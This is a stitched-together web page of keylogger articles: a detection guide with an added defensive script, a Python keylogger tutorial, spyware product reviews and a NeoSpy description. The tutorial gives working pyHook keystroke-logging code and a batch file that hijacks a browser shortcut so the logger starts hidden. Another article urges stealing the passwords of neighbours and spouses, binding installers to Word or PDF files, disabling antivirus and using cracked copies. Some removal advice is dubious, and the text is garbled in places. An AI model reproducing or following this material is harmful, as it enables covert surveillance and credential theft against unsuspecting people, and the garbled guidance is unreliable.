
What is a keylogger used for? Information Security Laboratory. Search and removal of keyloggers

There are various types of tricks used by hackers to steal our identity.

A keylogger is a malicious application or tool that many attackers use to track what we type, whom we communicate with, and how we connect to the network. Keyloggers have become one of the most powerful threats these days: they can record what you type and share it with hackers.

Knowing how to detect a keylogger and remove it from your computer can help protect your identity and privacy.

Step-by-step guide to detect Keylogger and remove it from your computer

It is not easy to tell whether your computer is affected by a keylogger without a guide like this one. Of course, there are tools and software to detect malicious threats, but knowing how to detect them manually can come in handy when it comes to protecting your identity.

Here are two ways by which you can detect whether a keylogger is installed on your device or not:

Method 1. Open the task manager using the keyboard shortcut Ctrl + Alt + Delete. Go to the processes option and look for a duplicate copy of the process named Winlogon. One process with this name is fine, but if there are two of them, then your device is infected with a keylogger.

Method 2. Sometimes a keylogger infects the device through malware that installs itself automatically while you are online. Searching for unwanted programs in Control Panel may reveal a keylogger. Here's how to find an unwanted program from Control Panel:

Go to the Start menu, select All Programs, and view all installed programs. If you find any program that you did not install, uninstall it. After removing an unnecessary program, you need to restart your device.
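For Method 1, note that Windows starts one winlogon.exe per logon session (for example with Fast User Switching or Remote Desktop), so a count alone can mislead. The following added example, which is not part of the original guide, checks each instance's image path and session instead; the CSV layout, the sample rows and the `C:\Windows` system root are assumptions.

```python
import csv
import io
import ntpath
from collections import defaultdict

# Assumption: Windows is installed in C:\Windows; change this for another system root.
EXPECTED = r"c:\windows\system32\winlogon.exe"

# Constructed sample in the column layout of the Win32_Process properties
# ProcessId, SessionId, Name and ExecutablePath (not output from a real host).
SAMPLE_CSV = r"""ProcessId,SessionId,Name,ExecutablePath
612,1,winlogon.exe,C:\Windows\System32\winlogon.exe
4388,2,winlogon.exe,C:\Windows\System32\winlogon.exe
5120,1,Winlogon.exe,C:\Users\Public\Winlogon.exe
5544,1,notepad.exe,C:\Windows\System32\notepad.exe
"""


def triage_winlogon(csv_text):
    """Return (pid, reason) pairs for winlogon.exe instances worth a closer look."""
    findings = []
    trusted_by_session = defaultdict(list)
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Name"].strip().lower() != "winlogon.exe":
            continue
        pid, session = int(row["ProcessId"]), int(row["SessionId"])
        raw_path = (row.get("ExecutablePath") or "").strip()
        if not raw_path:
            # The path is hidden from unprivileged users; do not treat it as clean.
            findings.append((pid, "path unavailable; rerun the listing elevated"))
            continue
        # Normalise slashes, redundant separators and case before comparing.
        path = ntpath.normcase(ntpath.normpath(raw_path))
        if path != EXPECTED:
            findings.append((pid, "unexpected image path: " + raw_path))
            continue
        trusted_by_session[session].append(pid)
    # Several sessions are normal; several instances inside one session are not.
    for session, pids in sorted(trusted_by_session.items()):
        if len(pids) > 1:
            for pid in pids:
                findings.append(
                    (pid, "more than one winlogon.exe in session %d" % session))
    return findings


if __name__ == "__main__":
    for pid, reason in triage_winlogon(SAMPLE_CSV):
        print(pid, reason)
```

A listing with these columns can be exported from an elevated PowerShell prompt with `Get-CimInstance Win32_Process | Select-Object ProcessId, SessionId, Name, ExecutablePath | Export-Csv`.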

How to remove Keylogger

Once you know how to detect a keylogger, you should know how to remove it from your computer. The keylogger can be removed from the device using the following two methods:

Method 1. If you find a keylogger in the task manager, delete the duplicate copy of Winlogon.

Method 2. If you find an unknown program installed on your system, uninstall the program.

These two are the easiest ways to detect and remove keylogger manually from your system. Manual methods lay the foundation to protect your computer from malicious activities and thus help prevent any data from being stolen.

There is also software available on the market that can help you detect keyloggers and remove them from your computer. Installing software that can detect and remove the malicious tool is another way to find a keylogger and remove it from your computer.

The software scans your computer for any malicious file that is capable of stealing information stored in it and sending it to hackers.

When malicious files are detected, the software quarantines them and processes them, deleting or restoring them after your team searches.

The software not only scans the computer, but also prevents or protects the computer by disabling the automatic installation of any program that may be at risk.

Keyloggers have become a major threat as more people use digital gadgets for various tasks. Be it an online transaction or private chats, keyloggers can capture the details and record everything you type using your device's keyboard.

Two types of keyloggers and how they affect your computer.

There are two types of keylogger: hardware keyloggers and software keyloggers.

Hardware keylogger:

A hardware keylogger comes in the form of a USB device that can be connected to the computer system. This particular type of keylogger is built into the back of the central processing unit (CPU) and captures keyboard activity.

Software keylogger:

A software keylogger is built into software or a program installed on your computer. When we install any software on a computer system, certain files are automatically created. These files can be malicious and can record and steal information from your computer.

No matter what type of keylogger your computer is affected by, each keylogger can cause irreversible losses.

Therefore, it is extremely important to detect the keylogger promptly to prevent any important data from being stolen.

You can protect your computer by updating your antivirus software. Frequent use of virus detectors also helps to detect and prevent any malicious program.

There is also one trick to avoid losing any type of information through the keyboard: you can store data like a username and password in a notepad and copy and paste the details when needed.

However, in this case, you will need to be extra aware of the data stored in the notepad as hackers can steal the information. The risk of hacking is everywhere, but it shouldn't stop us from using digital gadgets.

Use smart devices with vigilance. Don't let something like a keylogger stop you from moving forward on your path. Make sure your computer system is up to date and all programs are functioning properly.

Running antivirus software regularly can also help protect your computer when you're online as well as offline.

Hello, QUAZAR is here again. Today I will show you how to create a simple keylogger in Python. Of course, this keylogger cannot compete with such giants as, but despite this, it can find its use.

What is a keylogger?

You can read in detail about what a keylogger is and about the types of keyloggers in the article ““. To find additional materials on the topic, use the site search, which is located in the upper right corner. Just enter the word "keylogger" or "keylogger".

Simple keylogger in Python

To create a keylogger we need:

  • Operating system: Windows or MacOs (any Linux can also be used, but I haven't tried it personally)
  • Python installed on the target machine, as well as special libraries.

This material is for informational purposes only. The information presented in this article is provided for informational purposes only. Neither the editors of the website www.site nor the author of the publication bear any responsibility for any harm caused by the material in this article.

Creating a Simple Keylogger in Python

First you need to download and install Python.



After installing Python, you need to install the "pyHook" and "pywin32" modules. On this site you will find 32 and 64 bit versions for Windows and other OSes. Download "PYhook" and "pyWin32" according to your installed version of Python and Windows (32bit or 64bit).



Once downloaded, install and open IDLE (Python GUI) menu from the Start menu.


Go to the “File” menu and click on the “New File” item. Then paste the keylogger code:

#Name: QUAZAR
#Website: www.site
import pyHook, pythoncom, sys, logging
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

And save it by calling the file Keylogger.pyw. Just don't save the file in the root directory C: where you need administrator rights to copy and delete files. Create a new folder on your C: drive or some other location where you don't need administrator rights to copy files and save Keylogger.pyw there.

You can select any location as the output report file “file_log = “C:keyloggerlog.txt”, but preferably, of course, some hidden location on your hard drive. In this example, I will save the report file to disk in the root directory C:. After all, I have nothing to hide.

Automatic launch of a keylogger in Python

The keylogger is ready. Now we need to make sure that the keylogger starts hidden from the user and automatically when Windows boots. This can be implemented in different ways. Let's try to do it using a bat file by linking the launch of the keylogger to some program or by registering it in startup.

First, create a bat file. Copy and paste the following code into Notepad:

::Name: QUAZAR
::Website: www.site
@echo off
start "" "C:keyloggerkeylogger.pyw"
start "" "C:Program FilesOperalauncher.exe"

In the first line you need to enter the path to the keylogger.pyw file (in my case “C:keylogger.pyw”). In the second line, you must enter the path to the program that the user usually uses (in my case, the Opera browser).

After editing, save the file with a .bat extension (in my case logger.bat) in some hidden location on your computer (in my case in “C:keylogger.bat”).

Now go to the desktop and select a shortcut for a frequently used program (in my case, this is the Opera browser). Right-click the mouse to call up the context menu and go to the shortcut properties. In the “Object” field, enter the path to the keylogger bat file “C:keyloggerlogger.bat”.

After making changes, the shortcut icon will also change. But this can be easily solved on the properties tab (see screenshot above).
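A defender's counterpart to the tutorial above, as an added example that is not part of the original article: a static check that flags Python sources using the pyHook keyboard-hook calls named in the listing, and batch wrappers that start a script before a regular program. The file names and sample contents are constructed, and `scan_file` is a hypothetical helper.

```python
import ast
import re

# Indicators taken from the listing on this page; extend the sets for other hook libraries.
HOOK_MODULES = {"pyhook"}
HOOK_CALLS = {"HookKeyboard", "PumpMessages"}
START_RE = re.compile(r'^\s*start\s+"[^"]*"\s+"([^"]+)"', re.IGNORECASE)

# Constructed sample files (name -> content), not taken from a real system.
SAMPLE_FILES = {
    "helper.pyw": "import pyHook, pythoncom\n"
                  "hm = pyHook.HookManager()\n"
                  "hm.HookKeyboard()\n"
                  "pythoncom.PumpMessages()\n",
    "launch.bat": r'''@echo off
start "" "C:\Tools\helper.pyw"
start "" "C:\Program Files\Browser\browser.exe"
''',
    "report.py": "import csv\nprint('ok')\n",
}


def scan_python(source):
    """Return sorted indicator strings for keyboard-hook usage in Python source."""
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return ["unparseable Python source; review manually"]
    hits = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0].lower() in HOOK_MODULES:
                    hits.add("imports " + alias.name)
        elif isinstance(node, ast.ImportFrom) and node.module:
            if node.module.split(".")[0].lower() in HOOK_MODULES:
                hits.add("imports " + node.module)
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute):
            if node.func.attr in HOOK_CALLS:
                hits.add("calls " + node.func.attr)
    return sorted(hits)


def scan_batch(text):
    """Flag a wrapper that starts a Python script and then a regular executable."""
    targets = []
    for line in text.splitlines():
        match = START_RE.match(line)
        if match:
            targets.append(match.group(1))
    hits = []
    for i, target in enumerate(targets):
        is_script = target.lower().endswith((".py", ".pyw"))
        exe_follows = any(t.lower().endswith(".exe") for t in targets[i + 1:])
        if is_script and exe_follows:
            hits.append("starts script %s before a program launch" % target)
    return hits


def scan_file(name, text):
    """Dispatch on file extension and return the list of indicators found."""
    lower = name.lower()
    if lower.endswith((".py", ".pyw")):
        hits = scan_python(text)
        if hits and lower.endswith(".pyw"):
            hits.append("windowless .pyw extension")
        return hits
    if lower.endswith((".bat", ".cmd")):
        return scan_batch(text)
    return []


if __name__ == "__main__":
    for name, text in SAMPLE_FILES.items():
        print(name, scan_file(name, text))
```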

Various spy programs are necessary in conditions where many people have access to one computer.

In these circumstances, the user may want to know which sites were visited from his computer (for example, by children), whether credit cards were stolen using saved passwords, etc. To clarify these issues, it will be necessary.

Our review will allow you to make the best choice.

Features of choice

What exactly is a keylogger? This is a program that, strictly speaking, is not directly related to the keyboard.

It is installed in the computer's memory and acts on. Often, signs of its activity are not visible on the computer unless you specifically look for them.

Such a program interacts indirectly with the keyboard, that is, it works with a program on the PC that converts the signals received by the processor as a result of pressing buttons into text when printing.

That is, the action of such software is aimed at collecting information entered through the keyboard.

Such utilities come in different types - with some you can view all the text typed on the keyboard, with others - only what was typed in the browser or in any selected application.

Some programs provide the ability to configure such indicators, others do not.

They also differ from each other in the degree of secrecy. For example, the activity of some is obvious, a shortcut remains on the Desktop, etc., such programs are suitable for monitoring the activities of, for example, children.

Traces of the presence and activity of others are not noticeable at all - they act hidden and are suitable for installation on someone else’s computer, when the fact of installation needs to be hidden from a third-party user.

Given such diversity, choosing the most suitable software can be quite difficult.

This material presents the TOP of the best programs that can be used for this purpose. It is easier to choose the right one among them.

Specifications

To simplify the software selection process, the table below shows the main comparative characteristics of all programs included in the TOP.

Name | License type | Type of information collected | Functionality | Design
SC-KeyLog | For free | All | Wide | Simplified
WideStep Handy Keylogger | Free/Paid | All | Wide | Improved
Actual Spy | Paid | All | Very wide | Standard
EliteKeylogger | Paid | All | Wide | Standard
The Rat! | Free/Paid | Less than previous | Quite wide | Unaesthetic
SPYGO | For free | Depending on version | Depending on version | Standard Windows appearance
Ardamax Keylogger 2.9 | For free | From the keyboard | Narrowed | Simplified
NS Keylogger Personal Monitor 3.8 | For free | All | Narrowed | Simplified
KGB Spy | Paid | From the keyboard + open programs | Narrow | Simple
Golden Keylogger 1.32 | For free | From the keyboard | Very narrow | Simple

Based on the characteristics from this table, it is easy to choose the program that best suits your specific requirements.

These utilities are described in more detail below.

SC-KeyLog

This is a voluminous and functional spy program that is distributed free of charge.

In addition to specifically tracking information entered from the keyboard, it is also able to collect addresses of visited sites, passwords, and open browser windows.

Provides complete information about all actions performed on the computer. In this case, the generated file can be viewed remotely from another device.

  • Possibility of remote access to a file from another device;
  • No traces of program activity on the computer with the correct settings;
  • Variety of collected data - information about almost all actions on the PC can be accessed.
  • Saves passwords only up to NT0;
  • Too simple menu and unaesthetic design;
  • A rather inconvenient format for displaying the result.

What do users who actively use this software say? “Absolutely invisible to the user”, “Data arrives regularly by email.”

WideStep Handy Keylogger

This application is distributed free of charge. The full paid version costs $35.

Quite an interesting and functional program that is worth the money if you are willing to pay it.

Distinctive feature: the ability to send recorded data at a specified frequency. Otherwise it works fine, often more stable than other programs on this list.

  • Collection of various types of information;
  • Complete invisibility of work on the user’s computer;
  • Simple interface and controls.
  • The design is better than the previous program, but still not great;
  • The result display format is inconvenient;
  • The paid version is quite expensive.

Users' opinions about this software are as follows: “Convenient, simple and functional program. Quite invisible when working.”

Actual Spy

This is a functional and complex paid program that costs 600 rubles. However, it has a demo version that is free.

Feature of this software– ability in a given period of time.

This helps solve the problem of entering a graphic password/key, which has recently become widespread.

  • Many types of information collected plus the ability to take screenshots from the screen during a specified period;
  • A large number of other additional functions and features;
  • Records not only actions, but also the time they were performed;
  • Encrypts the generated log.
  • The duration of work (collection of information) in the free demo version is 40 minutes;
  • Paid distribution, although a more or less reasonable price;
  • The weight of the program is quite large.

User reviews of this application are as follows: “The program is excellent. Well done programmers!”

EliteKeylogger

A paid program with a fairly high price: 69 dollars. It operates completely undetectably on a PC in low-level mode, making it almost completely undetectable.

Interesting and convenient feature: automatic launch of software, occurring simultaneously with the launch of the system itself.

It is difficult to detect or not detected at all even by special anti-keyloggers.

  • Completely hidden action and difficult to detect;
  • Low-level driver-type operating format and automatic startup when the system boots;
  • It also tracks the presses of not only the main, but also the service keys on the keyboard.
  • A rather complex system for installing the program on a PC;
  • The program is expensive, but you can find an old hacked version on the Russian Internet;
  • A rather complex system of individual program settings, which, however, justifies itself.

What do users say about this software? “Good program”, “A little short of Jetlogger.”

The Rat!

Quite a common and popular, functional utility with a paid license.

However, for private use, a free demo version is provided for a limited period.

The program is very simple: any advanced user can write the same. However, it is completely undetectable by antiviruses and special programs that detect such software.

  • Simplicity, functionality and high stability;
  • Minimum file weight and space occupied by it on the computer;
  • Quite a lot of settings.
  • A rather unpleasant design, made in black, white and red;
  • The functionality is somewhat narrower than in the programs described before;
  • Inconvenient viewing of the log and generally inconvenient interface and use.

Users say the following about this program: “It works stably, but is a bit simple,” “The program is good, it allows you to collect data unnoticed.”

SPYGO

This is a fundamentally new keylogger, designed to work on and developed by a Russian programmer.

Who among us hasn’t wanted to feel like a cool hacker at least once and break at least something? :) Even if not, then let’s talk about how great it would be to get a password from your mail/social network. the network of a friend, wife/husband, roommate thought at least once, everyone. :) Yes, and you have to start somewhere, after all! A significant part of attacks (hacking) involves infecting the victim’s computer with so-called keyloggers (spyware).

So, in today’s article we’ll talk about what are free programs for monitoring windows-based computers, where you can download their full versions, how to infect a victim’s computer with them, and what are the features of their use.

But first, a little introduction.

What are keyloggers and why are they needed?

I think you yourself have guessed what it is. As a rule, they are a kind of program that is hidden (although this is not always the case) installed on the victim’s computer, after which it records absolutely all keystrokes on this node. Moreover, in addition to the clicks themselves, the following is usually recorded: the date and time of the click (action) and the program in which these actions were performed (browser, including the website address (hurray, we immediately see what the passwords are for!); local application; system services (including Windows login passwords), etc.).

From here one of the problems is immediately visible: I got access to my neighbor’s computer for a couple of minutes and I want to get her password from VK! I installed the miracle program and returned the computer. How can I look up passwords later? Looking for a way to take the computer from her again? The good news is: usually not. Most keyloggers are capable of not only storing the entire accumulated database of actions locally, but also sending it remotely. There are many options for sending logs:

  • A fixed email (there may be several) is the most convenient option;
  • FTP server (who has it);
  • SMB server (exotic, and not very convenient).
  • A fixed flash drive (you insert it into the USB port of the victim’s computer, and all logs are copied there automatically in invisible mode!).

Why is all this needed? I think the answer is obvious. In addition to the banal stealing of passwords, some keyloggers can do a number of other nice things:

  • Logging correspondence in specified social networks or instant messengers (for example, Skype).
  • Taking screenshots of the screen.
  • View/capture webcam data (which can be very interesting).

How to use keyloggers?

And this is a difficult question. You need to understand that just finding a convenient, functional, good keylogger is not enough.

So, what is needed for a spy program to work successfully?:

  • Administrator access to a remote computer.
    Moreover, this does not necessarily mean physical access. You can easily access it via RDP (Remote Desktop Service); TeamViewer; AmmyAdmin, etc.
    As a rule, the greatest difficulties are associated with this point. However, I recently wrote an article about how to get administrator rights in Windows.
  • Anonymous e-mail / ftp (by which you will not be identified).
    Of course, if you are breaking Aunt Shura for your neighbor, this point can be safely omitted. As is the case if you always have the victim’s computer at hand (ala, find out your brother/sister’s passwords).
  • Lack of working antiviruses / internal Windows protection systems.
    Most public keyloggers (which will be discussed below) are known to the vast majority of antivirus software (although there are logger viruses that are built into the OS kernel or system driver, and antiviruses can no longer detect or destroy them, even if they have detected them). Due to the above, anti-virus software, if any, will have to be mercilessly destroyed. In addition to antiviruses, systems like Windows Defender (these first appeared in Windows 7 and later) also pose a danger to our spyware. They detect suspicious activity in software running on a computer. You can easily find information on how to get rid of them on Google.

These, perhaps, are all the necessary and sufficient conditions for your success in the field of stealing other people’s passwords / correspondence / photos or whatever else you want to encroach on.

What types of spyware are there and where can I download them?

So, let’s begin the review of the main keyloggers that I used in my daily practice with links to free downloads of their full versions (i.e., all versions are the latest at the moment (for which it is possible to find a cure) and with already working and tested cracks).

0. The Rat!

Ratings (out of 10):

  • Stealth: 10
  • Convenience/usability: 9
  • Functionality: 8

It's just a bomb, not a keylogger! In working condition it takes 15-20 KB. Why be surprised: it is written entirely in assembly language (veteran programmers shed tears) and written mostly by enthusiastic hackers, due to which the level of its secrecy is simply amazing: it works at the OS kernel level!

In addition, the package includes FileConnector - a mini-program that allows you to connect this keylogger with absolutely any program. As a result, you get a new exe of almost the same size, and when launched, it works exactly like the program with which you glued it together! But after the first launch, your keylogger will be automatically installed in invisible mode with the parameters for sending logs that you have previously specified. Convenient, isn't it?

An excellent opportunity for social engineering (bring a game file/presentation to a friend on a flash drive, or even just a Word document (I’ll tell you how to create an exe file that launches a specific word/excel file in one of my next articles), launch, everything is fine and wonderful, but the friend is already invisibly infected!). Or you simply send this file to a friend by mail (preferably a link to download it, since modern mail servers prohibit sending exe files). Of course, there is still a risk from antiviruses during installation (but it will not exist after installation).

By the way, with the help of some other techniques you can glue together any hidden installation distribution (these are found in The Rat! and Elite keylogger) not only with exe files (which still raise suspicion among even more or less advanced users), but also with ordinary word / excel and even pdf files! No one will ever think anything about a simple pdf, but that’s not the case! :) How this is done is the topic of a whole separate article. Those who are especially zealous can write me questions through the feedback form. ;)

Overall, The Rat! can be described for a very long time and a lot. This was done much better than me. There is also a download link there.

1. Elite keylogger

Ratings (out of 10):

  • Stealth: 10
  • Convenience/usability: 9
  • Functionality: 8

Perhaps one of the best keyloggers ever created. Its capabilities, in addition to the standard set (interception of all clicks in the context of applications / windows / sites), include interception of instant messenger messages, pictures from a webcam, and also - which is VERY important! - interception of WinLogon service passwords. In other words, it intercepts Windows login passwords (including domain ones!). This became possible thanks to its work at the system driver level and launch even at the OS boot stage. Due to this same feature, this program remains completely invisible to both Kaspersky and all other anti-malware software. Frankly, I have not met a single keylogger capable of this.

However, you shouldn’t delude yourself too much. The installer itself is recognized by antiviruses very easily and to install it you will need administrator rights and disabling all antivirus services. After installation, everything will work perfectly in any case.

In addition, the described feature (working at the OS kernel level) introduces requirements for the OS version on which the keyloggers will work. Version 5-5.3 (links to which are given below) supports everything up to Windows 7, inclusive. Win 8 / 10, as well as Windows server family (2003 / 2008 / 2012) are no longer supported. There is version 6, which functions perfectly, incl. on win 8 and 10, however, it is currently not possible to find a cracked version. It will probably appear in the future. In the meantime, you can download Elite keylogger 5.3 from the link above.

There is no network operation mode, therefore it is not suitable for use by employers (to monitor the computers of their employees) or an entire group of people.

An important point is the ability to create an installation distribution with predefined settings (for example, with a specified email address where logs will need to be sent). At the same time, at the end you get a distribution kit that, when launched, does not display absolutely any warnings or windows, and after installation it can even destroy itself (if you check the appropriate option).


2. All-in-one keylogger.

Ratings (out of 10):

  • Stealth: 3
  • Convenience/usability: 9
  • Functionality: 8

It is also a very, very convenient thing. The functionality is quite at the level of Elite keylogger. Things are worse with secrecy. Winlogon passwords are no longer intercepted, it is not a driver, and is not built into the kernel. However, it is installed in system and hidden AppData directories, which are not so easily accessible to unauthorized users (not those on whose behalf it is installed). Nevertheless, antiviruses sooner or later successfully do this, which makes this thing not particularly reliable and safe when used, for example, at work to spy on your own superiors. ;) Gluing it to something or encrypting the code to hide it from antiviruses will not work.

Works on any version of Win OS (which is nice and practical).

As for the rest, everything is fine: it logs everything (except Windows login passwords), sends it anywhere (including e-mail, ftp, fixed flash drive). In terms of convenience, everything is also excellent.

3. Spytech SpyAgent.

Ratings (out of 10):

  • Stealth: 4
  • Convenience/usability: 8
  • Functionality: 10

Also a good keylogger, although with dubious secrecy. Supported OS versions are also all possible. The functionality is similar to previous options. There is an interesting self-destruct function after a specified period of time (or upon reaching a predetermined date).

In addition, it is possible to record video from a webcam and sound from a microphone, which can also be very popular and which the previous two representatives do not have.

There is a network mode of operation, which is convenient for monitoring an entire network of computers. By the way, StaffCop has it (it is not included in the review due to its uselessness for one user - an individual). Perhaps this program is ideal for employers to spy on their employees (although the leaders in this field are unconditionally StaffCop and LanAgent - if you are a legal entity, be sure to look in their direction). Or to keep track of your offspring who love to sit and watch “adult sites”. That is, where what is needed is not concealment, but convenience (including a bunch of beautiful log reports, etc.) and functionality for blocking specified sites/programs (SpyAgent also has it).

4. Spyrix Personal monitor.

Ratings (out of 10):

  • Stealth: 4
  • Convenience/usability: 6
  • Functionality: 10

The functionality is at the level of the previous candidate, but the same problems with secrecy. In addition, the functionality includes an interesting thing: copying files from USB drives inserted into the computer, as well as remote viewing of logs through a web account on the Spyrix website (but we are going to download a cracked version, so it will not work for us).

5. Spyrix Personal monitor.

Ratings (out of 10):

  • Stealth: 3
  • Convenience/usability: 6
  • Functionality: 8

I won’t describe it in detail, because this instance does not have anything that one of the previous spies did not have; however, someone may like this keylogger (at least for its interface).

What do we end up with?

The issue of using a keylogger is more ethical than technical, and it greatly depends on your goals.

If you are an employer who wants to control his employees, feel free to set up StaffCop, collect written permission from all employees for such actions (otherwise you may be seriously charged for such things) and the job is in the bag. Although I personally know more effective ways to increase the performance of my employees.

If you are a novice IT specialist who just wants to experience what it’s like to break someone - and how this thing works in general, then arm yourself with social engineering methods and conduct tests on your friends, using any of the examples given. However, remember: the detection of such activity by victims does not contribute to friendship and longevity. ;) And you definitely shouldn’t test this at your work. Mark my words: I have experience with this. ;)

If your goal is to spy on your friend, husband, neighbor, or maybe you even do it regularly and for money, think carefully about whether it’s worth it. After all, sooner or later they may attract. And it’s not worth it: “rummaging through someone else’s dirty laundry is not a pleasant pleasure.” If you still need to (or maybe you work in the field of investigating computer crimes and such tasks are part of your professional responsibilities), then there are only two options: The Rat! and Elite Keylogger. In the mode of hidden installation distributions, glued with word / excel / pdf. And it’s better, if possible, encrypted with a fresh cryptor. Only in this case can we guarantee safer activities and real success.

But in any case, it is worth remembering that the competent use of keyloggers is only one small link in achieving the goal (including even a simple attack). You don’t always have admin rights, you don’t always have physical access, and not all users will open, read, and even more so download your attachments/links (hello social engineering), the antivirus won’t always be disabled/your keylogger/cryptor won’t always be unknown to them . All these and many untold problems can be solved, but their solution is the topic of a whole series of separate articles.

In short, you have just begun to dive into the complex, dangerous, but incredibly interesting world of information security. :)

Sincerely, Lysyak A.S.

Keylogger is a program that reads the keys pressed and saves them to a file. In the future, you can view what the person wrote at the computer, what messages he typed and what passwords he entered. Another name for a keylogger is a keylogger, from the English “keylogger,” which literally means “recording buttons.”

In the NeoSpy program, the keylogger function is enabled by default; in this mode, the program records text, hotkey combinations and passwords typed on the keyboard. Managing keylogger settings is located in the menu "Tracking Settings" - "Log Recording" - "Keyboard". You can choose one of two operating modes of the program: standard and alternative. It is recommended to use the standard option 99% of the time, but if there is a conflict with your antivirus software, you can enable the alternative mode.

Setting up a keylogger


The keyboard log is always recorded in full format, including service keys. An example of such a log can be seen in the illustration. When viewing the report, you can disable the display of non-printable characters and view the log as simple text, more accessible for free reading.


Keylogger example

To make working with reports easier, typed passwords are highlighted in the list of keystrokes. This way you can find out your child’s passwords and, if necessary, protect him from unwanted acquaintances. If the NeoSpy program is used at an enterprise to monitor employees, then the collection of personal data and correspondence is prohibited by the legislation of most countries, so this option must be disabled, or the employee must be notified in writing about control by management and the inadmissibility of using a computer in the organization for personal correspondence.